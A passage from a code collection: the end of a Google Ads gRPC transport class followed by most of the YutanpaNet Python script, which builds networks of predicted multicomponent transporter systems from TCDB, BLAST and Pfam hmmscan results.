billing_setup.BillingSetup,
]:
r"""Return a callable for the get billing setup method over gRPC.
Returns a billing setup.
Returns:
Callable[[~.GetBillingSetupRequest],
~.BillingSetup]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_billing_setup" not in self._stubs:
self._stubs["get_billing_setup"] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v4.services.BillingSetupService/GetBillingSetup",
request_serializer=billing_setup_service.GetBillingSetupRequest.serialize,
response_deserializer=billing_setup.BillingSetup.deserialize,
)
return self._stubs["get_billing_setup"]
@property
def mutate_billing_setup(
self,
) -> Callable[
[billing_setup_service.MutateBillingSetupRequest],
billing_setup_service.MutateBillingSetupResponse,
]:
r"""Return a callable for the mutate billing setup method over gRPC.
Creates a billing setup, or cancels an existing
billing setup.
Returns:
Callable[[~.MutateBillingSetupRequest],
~.MutateBillingSetupResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "mutate_billing_setup" not in self._stubs:
self._stubs["mutate_billing_setup"] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v4.services.BillingSetupService/MutateBillingSetup",
request_serializer=billing_setup_service.MutateBillingSetupRequest.serialize,
response_deserializer=billing_setup_service.MutateBillingSetupResponse.deserialize,
)
return self._stubs["mutate_billing_setup"]
__all__ = ("BillingSetupServiceGrpcTransport",)
| 41.471831 | 99 | 0.630667 |
43077cf62285f87e0dcd29ca4a761335b0191c06 | 62,785 | py | Python | YutanpaNet.py | MogicianEik/YutanpaNet | 04cd79c51be37d23888db067712946d5620976cf | [
"MIT"
] | null | null | null | YutanpaNet.py | MogicianEik/YutanpaNet | 04cd79c51be37d23888db067712946d5620976cf | [
"MIT"
] | null | null | null | YutanpaNet.py | MogicianEik/YutanpaNet | 04cd79c51be37d23888db067712946d5620976cf | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import networkx as nx
import math
import os
from hmmscanParser import hmmParser
import argparse
from toolz import unique
from Bio import SeqIO
import subprocess
import more_itertools as mit
import operator
import json
import argparse
import sys
import os.path
import random
import sys
header = ["tname", "tacc", "tlen", "qname","qacc", "qlen", "E-value", "score", "bias", "#", "of","c-Evalue", "i-Evalue", "score", "bias", "hfrom", "hto","afrom", "ato", "efrom", "eto", "acc", "description of target"]
# In[2]:
def get_rawdata(raw_table_file):
df = pd.read_csv(raw_table_file,sep='\t',encoding = "ISO-8859-1")
# reorder cols
cols = ['subject_accession','tcid','query_accession','subject_tms','query_tms','status','query_length','subject_length','evalue','perc_idenity','alignment_length','query_coverage','subject_coverage','neighbors']
df = df[cols]
df.sort_values(by=['tcid','subject_accession','evalue','neighbors'],ascending=[True,True,True,False],inplace=True)
# rename repeat accessions in df, separate accession between genome and tcdb
repeats = list(set(list(df['query_accession'])) & set(list(df['subject_accession'])))
for index,row in df.iterrows():
if repeats:
if row['subject_accession'] in repeats:
df.at[index,'subject_accession'] = row['subject_accession']+':genome'
if row['query_accession'] in repeats:
df.at[index,'query_accession'] = row['query_accession']+':tcdb'
return df, repeats
# In[3]:
def get_mc(tcdb_faa, repeats):
'''
input a tcdb fasta file and return two lists. One for all single-component systems, one for multi-component systems
'''
systems = dict()
with open(tcdb_faa, 'r') as handle:
for record in SeqIO.parse(handle, 'fasta'):
tcid = record.id.split('-')[0]
acc = record.id.split('-')[1]
if acc in repeats:
acc = acc+':tcdb'
if tcid not in systems:
systems[tcid] = [acc]
else:
systems[tcid].append(acc)
mc = {k:systems[k] for k in systems if len(systems[k])>1}
return mc
def get_info(qacc_list, sacc_list, address='/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfococcus_multivorans',clan_info_file='/ResearchData/pfam/download/Pfam-A.clans.tsv.gz' ):
# eg: add = 'plots/Q92TN4_vs_Dmul_22110/ssearch_Dmul_22110_vs_Q92TN4/files/'
pfam_dic = dict()
clan_df = pd.read_csv(clan_info_file,sep='\t')
clan_df.columns = ['dacc','cacc','name','des1','des2']
clan_dic = dict(zip(clan_df['dacc'].values, clan_df['cacc'].values))
pairs = zip(qacc_list,sacc_list)
for p in pairs:
if str(p[1])=='nan':
continue
hmmscan = os.path.join(address,'plots/{}_vs_{}/ssearch_{}_vs_{}/files/hmmscan.out'.format(p[0].split(":")[0],p[1].split(":")[0],p[1].split(":")[0],p[0].split(":")[0]))
hmm = hmmParser(hmmscan)
df=pd.DataFrame(hmm.matrix,columns=header)
for index, row in df.iterrows():
qname = row['qname'].split('-')[-1]
if qname not in pfam_dic:
pfam_dic[qname] = {}
pacc = row['tacc'].split('.')[0]
if pacc not in pfam_dic[qname]: # get rid of ":"
pfam_dic[qname][pacc] = {}
pfam_dic[qname][pacc]['cood'] = [[int(row['efrom']),int(row['eto'])]]
pfam_dic[qname][pacc]['clan'] = clan_dic[pacc]
else:
pfam_dic[qname][pacc]['cood'].append([int(row['efrom']),int(row['eto'])])
pfam_dic[qname][pacc]['cood'] = list(map(list, unique(map(tuple, pfam_dic[qname][pacc]['cood']))))
pfam_dic[qname][pacc]['cood'].sort()
return pfam_dic
def get_cood(qacc, sacc, address):#TODO: detect accession for repeats and get rid of ':tcdb/:genome'
ssearch = os.path.join(address,'plots/{}_vs_{}/ssearch_{}_vs_{}/files/ssearch36.out'.format(qacc.split(":")[0],sacc.split(":")[0],sacc.split(":")[0],qacc.split(":")[0]))
goal = ''
with open(ssearch,"r") as f:
for line in f:
if line.startswith("Smith-Waterman"):
goal = line
break
coods = goal.split('overlap')[1]
s_coods = coods.split(':')[0].split('(')[1]
q_coods = coods.split(':')[1].split(')')[0]
s_cood = [int(s_coods.split('-')[0]),int(s_coods.split('-')[1])]
q_cood = [int(q_coods.split('-')[0]),int(q_coods.split('-')[1])]
return q_cood, s_cood
def alignment_has_domain(qacc,sacc,pfam_dic,address ):
true_qacc = qacc.split(":")[0]
true_sacc = sacc.split(":")[0]
q_cood,s_cood = get_cood(qacc, sacc,address) # get the alignment coordinates
# check if one of the protein does not has any domain predicted
if not qacc in list(pfam_dic.keys()) or not sacc in list(pfam_dic.keys()):
return [False,False]
q_domains = list(pfam_dic[true_qacc].keys())
s_domains = list(pfam_dic[true_sacc].keys())
# check if domain exists in both alignments and if there is a common domain
qdwa = []
sdwa = []
for qdacc in q_domains:
for loc in pfam_dic[true_qacc][qdacc]['cood']:
if (loc[0] <= q_cood[1] and loc[0] >= q_cood[0]) or (loc[1] <= q_cood[1] and loc[1] >= q_cood[0]) or (loc[1] > q_cood[1] and loc[0] < q_cood[0]):
qdwa.append(qdacc)
for sdacc in s_domains:
for loc in pfam_dic[true_sacc][sdacc]['cood']:
if (loc[0] <= s_cood[1] and loc[0] >= s_cood[0]) or (loc[1] <= s_cood[1] and loc[1] >= s_cood[0]) or (loc[1] > s_cood[1] and loc[0] < s_cood[0]):
sdwa.append(sdacc)
if len(qdwa) == 0 or len(sdwa) == 0:
return [False,False] # at least one protein has no domian info within the alignment
# check intersection
intersact = list(set(qdwa) & set(sdwa))
if len(intersact) == 0:
return [True,False] # alignment has no common domain
else:
return [True,True] # alignment has common domains
def domain_extension(qacc,sacc,pfam_dic,address):
qacc = qacc.split(":")[0] # get rid of the ':'
sacc = sacc.split(":")[0]
q_cood,s_cood = get_cood(qacc, sacc,address) # get the alignment coordinates
qde,sde = get_cood(qacc, sacc,address)
q_domains = list(pfam_dic[qacc].keys())
s_domains = list(pfam_dic[sacc].keys())
# check if domain exists in both alignments and if there is a common domain
qdwa = []
sdwa = []
for qdacc in q_domains:
for loc in pfam_dic[qacc][qdacc]['cood']:
if (loc[0] <= q_cood[1] and loc[0] >= q_cood[0]) or (loc[1] <= q_cood[1] and loc[1] >= q_cood[0]) or (loc[1] > q_cood[1] and loc[0] < q_cood[0]):
qdwa.append(qdacc)
for sdacc in s_domains:
for loc in pfam_dic[sacc][sdacc]['cood']:
if (loc[0] <= s_cood[1] and loc[0] >= s_cood[0]) or (loc[1] <= s_cood[1] and loc[1] >= s_cood[0]) or (loc[1] > s_cood[1] and loc[0] < s_cood[0]):
sdwa.append(sdacc)
intersact = list(set(qdwa) & set(sdwa))
for i in intersact:
for coods in pfam_dic[qacc][i]['cood']:
if coods[1] < q_cood[0]:
continue
if coods[0] > q_cood[1]:
continue
if coods[0] < q_cood[0] and coods[1] < q_cood[1] and coods[0] < qde[0]:
qde[0] = coods[0]
if coods[0] < q_cood[1] and coods[1] > q_cood[1] and coods[1] > qde[1]:
qde[1] = coods[1]
for coods in pfam_dic[sacc][i]['cood']:
if coods[1] < s_cood[0]:
continue
if coods[0] > s_cood[1]:
continue
if coods[0] < s_cood[0] and coods[1] < s_cood[1] and coods[0] < sde[0]:
sde[0] = coods[0]
if coods[0] < s_cood[1] and coods[1] > s_cood[1] and coods[1] > sde[1]:
sde[1] = coods[1]
return qde,sde
def count_complete_systems(G,nodes): # G is the target network for checking completeness
# number of complete systems
systems = [x for x,y in G.nodes(data=True) if y['attr_dic']['tp'] == 'system']
num = 0
for s in systems:
situation = check_complete(nodes,G,s)
if situation[0] == True:
num = num + 1
return num
def get_gene_feature(gene_feature_file):#TODO: detect accession for repeats and get rid of ':tcdb/:genome' #TODO: add feature for accession column specification
stdoutdata = subprocess.getoutput("zgrep CDS {} | cut -f 8,9,10,11".format(gene_feature_file))
#a = subprocess.Popen("zgrep gene {} | cut -f 8,9,10,17".format(gene_feature_file), stdout=subprocess.PIPE)
data = stdoutdata.split()
#print(data)
gene_feature = []
for i in range(int(len(data)/4)):
index = i*4
gene_feature.append([data[index+3].split(".")[0],data[index+2],int(data[index]),int(data[index+1])])
# gene_accession/locus_tag, strand, start, end
gene_feature.sort(key=lambda x: x[2]) # sort by the left coordinate
# return a dic
gene_dic = {}
for gene in gene_feature:
gene_dic[gene[0]] = {'strand':gene[1],'start':gene[2],'end':gene[3]}
return gene_dic
def get_strand(gene_dic, gacc):
return gene_dic[gacc]['strand']
def get_genetic_distance(gene_dic, gacc_list, condition): # returns genetic distance between genes according to different situations based on biological fact of that genome
# genetic distance is represented as the number of genes apart from any two genes
# len(gacc_list) must be greater than 1
if len(gacc_list) < 2:
return {gacc_list[0]:{gacc_list[0]:0}}
#raise ValueError('Need more gene accessions!')
gene_list = list(gene_dic.keys())
gene_distance = {}
for gacc in gacc_list:
gene_distance[gacc] = {}
for g in gacc_list:
if condition == 'linear':
gene_distance[gacc][g] = abs(gene_list.index(gacc.split(":")[0])-gene_list.index(g.split(":")[0]))
else:
dis = abs(gene_list.index(gacc.split(":")[0])-gene_list.index(g.split(":")[0]))
gene_distance[gacc][g] = min(dis, len(gene_list)-dis)
return gene_distance
#eg: et_genetic_distance(gene_dic, gacc_list=['Dmul_00010','Dmul_02460','Dmul_04350'], condition='linear')
# return: {'Dmul_00010': {'Dmul_00010': 0, 'Dmul_02460': 252, 'Dmul_04350': 440},
# 'Dmul_02460': {'Dmul_00010': 252, 'Dmul_02460': 0, 'Dmul_04350': 188},
#. 'Dmul_04350': {'Dmul_00010': 440, 'Dmul_02460': 188, 'Dmul_04350': 0}}
# In[4]:
def generate_weight(qacc,sacc,evalue,qcov,scov,pfam_dic,address):
# domin_info are dictionaries that key is domain_clan, value are coordinates,
# domain orders should be sorted based on the first coordinate
# normalized evalue is the -log(eval,10) and assigned with tiers.
weight = 0 # possibility that a protein genome travels to a component system
if evalue == 0:
log_eval = 100
else:
log_eval = -1 * math.log(evalue,10)
normalized_eval = 0
if log_eval >= 30 :
normalized_eval = 1
elif log_eval >= 11:
normalized_eval = 0.8
elif log_eval >= 7:
normalized_eval = 0.6
else:
normalized_eval = 0.4
situations = alignment_has_domain(qacc,sacc,pfam_dic,address)
if situations[0] == False:
weight = 0.5*normalized_eval + 0.5* max(scov,qcov)/100
# I expected one of them has a high coverage in two types of fusion
# number of difference of tms within the alignment range will be considered, but in a limited affect
else:
if situations[1] == True:
weight = 0.25*normalized_eval + 0.25* max(scov,qcov)/100 +0.5
# image a protein like this: subject plot: -- -- -- -- --
#------------------------------------------| | | | | | | | | |, 5 tms in total
# query in genome hit the left part without any tms:
# -------------------------------------
# coverage of query: ~90%, coverage of subject: ~50%, totoal TMS difference: 5, normalized-eval: 1
# domain overlap ? YES
# according to the equation stated, the weight/possibility/confidence will be really close to 1
# since only the larger percent coverage will be used
# during the graph search step, this protein still has a high chance to travel to this component,
# and we expect a second protein hits a membrane part
else:
print('punish_case: '+qacc + ', '+sacc)
weight = 0.25*normalized_eval + 0.25* max(scov,qcov)/100
return int((1-weight)*100)
# In[5]:
def add_system(nodes,edges,T_com,tcid,S): #returns a modified subnetwork by adding a new system into the netowrk #nodes/edges is a dic of all nodes generated by the raw_network
if tcid not in S:
S.add_node(tcid, attr_dic=nodes[tcid])
for cpt in list(T_com.predecessors(tcid)):
if cpt not in S:
S.add_node(cpt,attr_dic=nodes[cpt])
S.add_edge(cpt,tcid,attr_dic=edges[(cpt,tcid)])
for cand in list(T_com.predecessors(cpt)):
if cand not in S:
S.add_node(cand, attr_dic=nodes[cand])
S.add_edge(cand,cpt,attr_dic=edges[(cand,cpt)])
if len(list(T_com.predecessors(tcid))) != len(nodes[tcid]['components']):
for mcpt in nodes[tcid]['components']:
if mcpt not in S and mcpt in nodes:
S.add_node(mcpt,attr_dic=nodes[mcpt])
S.add_edge(tcid,mcpt,attr_dic=edges[(tcid,mcpt)])
elif mcpt not in nodes:
print("Data incoherent! {} is in TCDB but not in the raw table!".format(mcpt))
def add_system_v2(nodes,edges,T_com,tcid,S): #returns a modified subnetwork by adding a new system into the netowrk #nodes/edges is a dic of all nodes generated by the raw_network
if tcid not in S:
S.add_node(tcid, attr_dic=nodes[tcid]['attr_dic'])
for cpt in list(T_com.predecessors(tcid)):
if cpt not in S:
S.add_node(cpt,attr_dic=nodes[cpt]['attr_dic'])
S.add_edge(cpt,tcid,attr_dic=edges[(cpt,tcid)])
for cand in list(T_com.predecessors(cpt)):
if cand not in S:
S.add_node(cand, attr_dic=nodes[cand]['attr_dic'])
S.add_edge(cand,cpt,attr_dic=edges[(cand,cpt)])
if len(list(T_com.predecessors(tcid))) != len(nodes[tcid]['attr_dic']['components']):
for mcpt in nodes[tcid]['attr_dic']['components']:
if mcpt not in S:
S.add_node(mcpt,attr_dic=nodes[mcpt]['attr_dic'])
S.add_edge(tcid,mcpt,attr_dic={'tp':'nohit'})
# In[19]:
def show_subnetwork(T,raw_tree, node_list,gene_feature_file,address,condition='linear',name='isolated_system.html',raw_network=False): # T is a refined tree that certain systems has been selected
H = nx.DiGraph() # the original tree generated from the table must be provided
nodes = dict(raw_tree.nodes(data=True))
edges = dict(((u,v),e) for u,v,e in raw_tree.edges(data=True))
candidates = [x for x,y in T.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
systems = [x for x,y in T.nodes(data=True) if y['attr_dic']['tp'] == 'system']
for nacc in node_list:
if nacc in systems and nacc not in H:
H.add_node(nacc,attr_dic=nodes[nacc]['attr_dic'])
for cpt in list(T.predecessors(nacc)):
H.add_node(cpt,attr_dic=nodes[cpt]['attr_dic'])
H.add_edge(cpt,nacc,attr_dic=edges[cpt,nacc])
for cand in list(T.predecessors(cpt)):
if cand not in H:
H.add_node(cand,attr_dic=nodes[cand]['attr_dic'])
H.add_edge(cand,cpt,attr_dic=edges[cand,cpt])
if len(list(T.successors(nacc))) > 0: # consider incomplete trees
for cpt in list(T.successors(nacc)):
H.add_node(cpt,attr_dic=nodes[cpt]['attr_dic'])
H.add_edge(nacc,cpt,attr_dic=edges[nacc,cpt])
if len(list(T.predecessors(nacc))) != len(nodes[nacc]['attr_dic']['components']):
for mcpt in nodes[nacc]['attr_dic']['components']:
if mcpt not in H:
H.add_node(mcpt,attr_dic={'tp':'nohit'})
H.add_edge(nacc,mcpt,attr_dic={'tp':'nohit'})
elif nodes[nacc]['attr_dic']['tp']=='subject' and nacc not in H :
first_cpt = list(T.successors(nacc))[0]
first_tcid = list(T.successors(first_cpt))[0]
linked_sys = [first_tcid]
for ls in linked_sys:
if ls in T:
for cpt in list(T.predecessors(ls)):
for cand in list(T.predecessors(cpt)):
for cp in list(T.successors(cand)):
p_sys = list(T.successors(cp))[0]
if p_sys not in linked_sys:
linked_sys.append(p_sys)
for ls in linked_sys:
add_system_v2(nodes,edges,T,ls,H)
network_visualization_v2(H,gene_feature_file,address,condition,name,raw_network)
# In[7]:
def get_tcdic(tvt_out,percent):
tvt = open(tvt_out,'r')
tdic = {}
for line in tvt.readlines():
if '#' in line:
continue
li = line.split()
q = li[0].split('-')[1]
s = li[1].split('-')[1]
if q == s:
continue
qstart = int(li[2])
qend = int(li[3])
qlen = int(li[4])
sstart = int(li[5])
send = int(li[6])
slen = int(li[7])
qmaxunalign = max(qstart-1,qlen-qend)/qlen
smaxunalign = max(sstart-1,slen-send)/slen
if qmaxunalign <= percent and smaxunalign <= percent:
if q not in tdic:
tdic[q] = [s]
else:
tdic[q].append(s)
return tdic
# In[8]:
def CrossValidation(q, s, tcdic, G):#query is tc component, subjuect is candidate protein
for component in list(G.successors(s)):
if component == q:
continue
if G[s][component]['fusion'] == False:
if component in tcdic:
if q in tcdic[component]:
return True
return False
# In[9]:
def verify_fusion(G,address):
cands = [x for x,y in G.nodes(data=True) if y['tp'] == 'subject']
for cand in cands:
outgoing_edges = G.out_edges(cand,data=True)
fusion_edges = [ie for ie in outgoing_edges if ie[2]['fusion']==True]
if len(fusion_edges) == 0:
continue
candil = [fe for fe in fusion_edges if fe[2]['qcov'] > fe[2]['scov']] # candidate is larger
if len(candil) == 0:
continue
else: # determine if the candidate hit multiple different components in the same system
# remove edges that this candiate hits only once
hit_dic = {}
for cdil in candil:
hit_sys = list(G.successors(cdil[1]))[0]
if hit_sys not in hit_dic:
hit_dic[hit_sys] = {}
hit_dic[hit_sys]['cpts'] = [cdil[1]]
hit_dic[hit_sys]['counts'] = 1
else:
hit_dic[hit_sys]['cpts'].append(cdil[1])
hit_dic[hit_sys]['counts'] = hit_dic[hit_sys]['counts'] + 1
for hit in hit_dic:
if hit_dic[hit]['counts'] == 1:
continue
else: #verify true fusion
complemant = False
s_cood_mark = []
for cpt in hit_dic[hit_sys]['cpts']:
if complemant == True:
continue
q_cood,s_cood = get_cood(cpt, cand,address)
if len(s_cood_mark) == 0:
s_cood_mark = s_cood
else:
if s_cood[0] > s_cood_mark[1] or s_cood_mark[0] > s_cood[1]: #no overlap
complemant = True
elif (s_cood[0] < s_cood_mark[0] and s_cood[1] > s_cood_mark[1]) or (s_cood[0] > s_cood_mark[0] and s_cood[1] < s_cood_mark[1]):
complemant = False
else: # overlap
overlap_cood = s_cood + s_cood_mark
# check the overlap of coordinates
overlap_cood.sort()
if (overlap_cood[2]-overlap_cood[1])/(overlap_cood[3]-overlap_cood[0]) <= 0.5:
complemant = True
if complemant == True: # remove all edges
for cpt in hit_dic[hit_sys]['cpts']:
G[cand][cpt]['fusion_bonus'] = 50
G[cand][cpt]['fusion_verification'] = 'verified'
# deal with situation that component is larger
cpts = [x for x,y in G.nodes(data=True) if y['tp'] == 'component' and len(list(G.successors(x)))==1]
for comp in cpts:
in_edges = G.in_edges(comp,data=True)
fusion_edges = [ie for ie in in_edges if ie[2]['fusion']==True]
if len(fusion_edges) == 0:
continue
compil = [fe for fe in fusion_edges if fe[2]['qcov'] < fe[2]['scov']] # component is larger
if len(compil) == 0:
continue
elif len(compil) == 1: # remove
continue
else: # determine overlap
complemant = False
q_cood_mark = []
for cpil in compil:
if complemant == True:
continue
q_cood,s_cood = get_cood(comp, cpil[0],address)
if len(q_cood_mark) == 0:
q_cood_mark = q_cood
else:
if q_cood[0] > q_cood_mark[1] or q_cood_mark[0] > q_cood[1]: #no overlap
complemant = True
elif (q_cood[0] < q_cood_mark[0] and q_cood[1] > q_cood_mark[1]) or (q_cood[0] > q_cood_mark[0] and q_cood[1] < q_cood_mark[1]):
complemant = False
else:
overlap_cood = q_cood + q_cood_mark
overlap_cood.sort()
if (overlap_cood[2]-overlap_cood[1])/(overlap_cood[3]-overlap_cood[0]) <= 0.5:
complemant = True
if complemant == True:
for cpil in compil:
G[cpil[0]][comp]['fusion_bonus'] = 50
G[cpil[0]][comp]['fusion_verification'] = 'verified'
# In[10]:
def initialize_raw_network(df,repeats,pdic,tcdb,address,pog=0.24):
if not os.path.isfile('tcdb_vs_tcdb.out'):
tc_components = list(set((df['tcid'] + '-'+df['query_accession']).tolist()))
out = open('tcdb_entries.faa', 'wb')
for tc in tc_components:
p = subprocess.Popen('blastdbcmd -db tcdb -entry {} -target_only'.format(tc), stdout=subprocess.PIPE, stderr = subprocess.PIPE, shell=True)
for line in p.stdout:
out.write(line)
os.system("blastp -query tcdb_entries.faa -subject tcdb_entries.faa -use_sw_tback -out tcdb_vs_tcdb.out -evalue 1e-6 -outfmt '7 qacc sacc qstart qend qlen sstart send slen length evalue pident'")
tcdic = get_tcdic('tcdb_vs_tcdb.out',pog)
G = nx.DiGraph()
mc = get_mc(tcdb,repeats)
fusion_candidates = []
for index,row in df.iterrows():
if not math.isnan(float(row['evalue'])):
if row['tcid'] not in G:
G.add_node(row['tcid'],tp='system',components=mc[row['tcid']])
if row['subject_accession'] not in G:
G.add_node(row['subject_accession'],tp='subject', length = row['subject_length'],tms = row['subject_tms'])
if row['query_accession'] not in G:
G.add_node(row['query_accession'],tp='component', length = row['query_length'],tms = row['query_tms'])
# assign potential fusions
# definition: largest unaligned potion/lengh > 23%
q_cood,s_cood = get_cood(row['query_accession'], row['subject_accession'], address)
if q_cood[0]-0 > row['query_length']-q_cood[1]:
q_max_unalign = [0,q_cood[0]]
else:
q_max_unalign = [q_cood[1],row['query_length']]
if s_cood[0]-0 > row['subject_length']-s_cood[1]:
s_max_unalign = [0,s_cood[0]]
else:
s_max_unalign = [s_cood[1],row['subject_length']]
q_portion = (q_max_unalign[1]-q_max_unalign[0])/row['query_length']
s_portion = (s_max_unalign[1]-s_max_unalign[0])/row['subject_length']
ds = alignment_has_domain(row['query_accession'], row['subject_accession'],pdic,address)
if (q_portion <= 0.23 and s_portion <= 0.23):
G.add_edge(row['subject_accession'],row['query_accession'],tp = 'q_vs_s',evalue=row['evalue'],qcov = row['query_coverage'],scov =row['subject_coverage'],fusion=False,weight=generate_weight(row['query_accession'],row['subject_accession'],row['evalue'],
row['query_coverage'],row['subject_coverage'],pdic,address),fusion_bonus=0,fusion_verification = '')
elif ds[0] == True and ds[1] == True:
qde,sde = domain_extension(row['query_accession'], row['subject_accession'],pdic,address)
if (qde[1]-qde[0])/row['query_length'] >= 0.77 and (qde[1]-qde[0])/(q_cood[1]-q_cood[0]) <=2 and (sde[1]-sde[0])/row['subject_length'] >= 0.77 and (sde[1]-sde[0])/(s_cood[1]-s_cood[0]) <= 2:
G.add_edge(row['subject_accession'],row['query_accession'],tp = 'q_vs_s',evalue=row['evalue'],qcov = row['query_coverage'],scov =row['subject_coverage'],fusion=False,weight=generate_weight(row['query_accession'],row['subject_accession'],row['evalue'],
row['query_coverage'],row['subject_coverage'],pdic,address),fusion_bonus=0,fusion_verification = '')
else:
G.add_edge(row['subject_accession'],row['query_accession'],tp = 'q_vs_s',evalue=row['evalue'],qcov = row['query_coverage'],scov =row['subject_coverage'],fusion=True,weight=generate_weight(row['query_accession'],row['subject_accession'],row['evalue'],
row['query_coverage'],row['subject_coverage'],pdic,address),fusion_bonus=0,fusion_verification = '')
fusion_candidates.append([row['subject_accession'],row['query_accession']])
else:
G.add_edge(row['subject_accession'],row['query_accession'],tp = 'q_vs_s',evalue=row['evalue'],qcov = row['query_coverage'],scov =row['subject_coverage'],fusion=True,weight=generate_weight(row['query_accession'],row['subject_accession'],row['evalue'],
row['query_coverage'],row['subject_coverage'],pdic,address),fusion_bonus=0,fusion_verification = '')
fusion_candidates.append([row['subject_accession'],row['query_accession']])
G.add_edge(row['query_accession'],row['tcid'],tp = 'hit',title='',weight=1)
else:
if row['tcid'] not in G:
G.add_node(row['tcid'],tp='system',components=mc[row['tcid']])
G.add_node(row['query_accession'],tp='component', length = row['query_length'],tms = row['query_tms'])
G.add_edge(row['tcid'],row['query_accession'],tp='nohit',title='Nohit',weight=1)
for fc in fusion_candidates:
if CrossValidation(fc[1],fc[0],tcdic,G) == True:
G[fc[0]][fc[1]]['fusion'] = False
# add fusion bonus to the raw network
verify_fusion(G,address)
print(G)
return G
# In[11]:
def check_complete(nodes,G, s): # s for a system node in graph, nodes is a dic of all node
complete = True
missing = []
if len(nodes[s]['components']) != len(list(G.predecessors(s))):
missing = [x for x in nodes[s]['components'] if x not in list(G.predecessors(s))]
return [False,missing]
else:
for cpt in list(G.predecessors(s)):
if len(list(G.predecessors(cpt))) == 0:
complete = False
missing.append(cpt)
return [complete,missing]
# recommend system , returns two new trees that attributes are different than the original tree. added attr_dic = {all original attributes}
def raw_recom(H,gene_dic,degree_of_tolerance=2,condition='linear'):
nodes = dict(H.nodes(data=True))
edges = dict(((u,v),e) for u,v,e in H.edges(data=True))
candidates = [x for x,y in H.nodes(data=True) if y['tp'] == 'subject']
systems = [x for x,y in H.nodes(data=True) if y['tp'] == 'system']
cpts = [x for x,y in H.nodes(data=True) if y['tp'] == 'component']
raw_com = nx.DiGraph() # build up a network that contains only complete systems found from the raw_network
T = nx.DiGraph() # inlcudes every node, but structures/edges are re-assinged/discarded after the recommand process
for s in systems:
situation = check_complete(nodes,H,s)
if situation[0] == True: # also add possible incomplete systems
add_system(nodes,edges,H,s,raw_com)
raw_com_candidates = [x for x,y in raw_com.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
for c in raw_com_candidates:
length,path = nx.single_source_dijkstra(raw_com,c)
#print (length)
# get the shortest lengh & path of a system + degree_of_tolerance
node = list(length.keys())
cpts_len = {k:length[k] for k in node if k in cpts}
#sys_path = {k:path[k] for k in node if k in systems}
# check if multiple len recorded in the system and choose the shortest lengths
key_min = min(cpts_len.keys(), key=(lambda k: cpts_len[k]))
adj_len = cpts_len[key_min] + degree_of_tolerance
#print(adj_len)
cpts_len_con = {k:cpts_len[k] for k in cpts_len if cpts_len[k]<=adj_len}
for nd in cpts_len_con:
for n in path[nd]:
if n not in T:
T.add_node(n,attr_dic=nodes[n])
# check if edge has already been added
if not T.has_edge(path[nd][0],path[nd][1]):
T.add_edge(path[nd][0],path[nd][1],attr_dic=edges[path[nd][0],path[nd][1]])
tcnode = list(H.successors(nd))[0]
if tcnode not in T:
T.add_node(tcnode,attr_dic=nodes[tcnode])
if not T.has_edge(nd,tcnode):
T.add_edge(nd,tcnode,attr_dic=edges[(nd,tcnode)])
#systems = [x for x,y in H.nodes(data=True) if y['tp'] == 'system']
raw_com_systems = [x for x,y in raw_com.nodes(data=True) if y['attr_dic']['tp'] == 'system']
incom = 0
for s in raw_com_systems:
situation = check_complete(nodes,T,s)
if situation[0] == True:
print(s + ' is complete: ')
for cpt in list(T.predecessors(s)):
if len(list(T.predecessors(cpt))) > 0:
print('component '+cpt+' has candidates: ')
for cand in list(T.predecessors(cpt)):
if edges[(cand,cpt)]['fusion'] == True:
print(cand+'( fusion' +' '+ edges[(cand,cpt)]['fusion_verification']+' )')
else:
print(cand)
else:
print('component '+cpt+' has no candidates!')
print('\n')
for s in systems:
situation = check_complete(nodes,H,s)
if situation[0] == False and len(situation[1])<=4: # also add possible incomplete systems
add_system(nodes,edges,H,s,T)
incom += 1
print(s + ' is incomplete: ')
for cpt in list(T.predecessors(s)):
print('component '+cpt+' has candidates: ')
for cand in list(T.predecessors(cpt)):
if edges[(cand,cpt)]['fusion'] == True:
print(cand+'( fusion' +' '+ edges[(cand,cpt)]['fusion_verification']+' )')
else:
print(cand)
for mcpt in list(T.successors(s)):
print('component '+mcpt+' has no candidates!')
print('\n')
print('The total number of complete systems is: '+str(count_complete_systems(T,nodes)))
print('The total number of incomplete systems, but possible to be completed later, is: '+str(incom))
return T
# In[12]:
def network_visualization_v2(G,gene_feature_file,address,condition = 'linear',name='ms_test.html',raw_network=False):
nodes = dict(G.nodes(data=True))
edges = dict(((u,v),e) for u,v,e in G.edges(data=True))
jnodes = {n:{'tp':nodes[n]['attr_dic']['tp']} for n in nodes}
systems = [x for x,y in G.nodes(data=True) if y['attr_dic']['tp'] == 'system']
cands = [x for x,y in G.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
gene_dic = get_gene_feature(gene_feature_file)
group = 1
for jn in jnodes:
if jnodes[jn]["tp"] == "subject":
jnodes[jn]["group"] = 0
jnodes[jn]["color"] = "#1ad8f6"
jnodes[jn]["fx"] = 0
jnodes[jn]["fy"] = 0
jnodes[jn]["fz"] = 0#group * 10 *random.uniform(-1,1)
jnodes[jn]["note"] = "<span style='font-size:24px; color:red'>Accession: {} <br />#TMS: {} <br /> Matched Components:".format(jn,nodes[jn]['attr_dic']['tms'])
elif jnodes[jn]["tp"] == "component":
jnodes[jn]["color"] = "#1af688"
jnodes[jn]["note"] = "<span style='font-size:24px; color:red'>Accession: {} <br />#TMS: {}".format(jn,nodes[jn]['attr_dic']['tms'])
jnodes[jn]["fx"] = 0
jnodes[jn]["fy"] = 0
jnodes[jn]["fz"] = 0#group * 10 *random.uniform(-1,1)
jnodes[jn]["group"] = group
group += 1
else:
jnodes[jn]["color"] = "#f6381a"
jnodes[jn]["note"] = "<span style='font-size:24px; color:red'>#components: {}".format(len(nodes[jn]['attr_dic']['components']))
jnodes[jn]["fx"] = 0
jnodes[jn]["fy"] = 0
jnodes[jn]["fz"] = 0#group * 20 *random.uniform(-1,1)
jnodes[jn]["group"] = group
group += 1
all_dist = get_genetic_distance(gene_dic, cands,condition)
